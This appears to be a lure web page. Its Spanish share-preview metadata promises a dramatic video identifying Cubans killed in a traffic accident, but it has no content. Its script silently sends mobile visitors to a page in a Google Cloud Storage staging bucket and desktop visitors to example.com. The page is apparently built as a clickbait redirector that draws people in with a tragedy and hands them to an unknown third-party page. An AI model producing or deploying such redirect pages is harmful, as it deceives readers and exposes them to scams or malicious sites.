<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="mypace"/>
<meta name="keywords" content="mypace"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Dramático video: Revelan identidades de cubanos fallecidos y heridos en accidente de transito esta mañana"/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1230492694724476990/1231084305665753108/hgfdfhfghhfgfgh.jpg?ex=6635ab9a&is=6623369a&hm=592bad2a18c8549c897ed33ba69c9e0292aad58a537301cbe15af0ca19728cac&=&format=webp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
	function generateRandomString(iLen) {
    var sRnd = '';
    var sChrs = "abcdefghiklmnopqrstuvwxyz";
    for (var i = 0; i < iLen; i++) {
      var randomPoz = Math.floor(Math.random() * sChrs.length);
      sRnd += sChrs.substring(randomPoz, randomPoz + 1);
    }
    return sRnd;
  }
        if (screen.width <= 720) {
        window.location = "https://storage.googleapis.com/staging.zankiops001.appspot.com/prueba2221/ahy001.html";
    } else {
        window.location = "https://example.com/default_page.html"
    }
</script>


    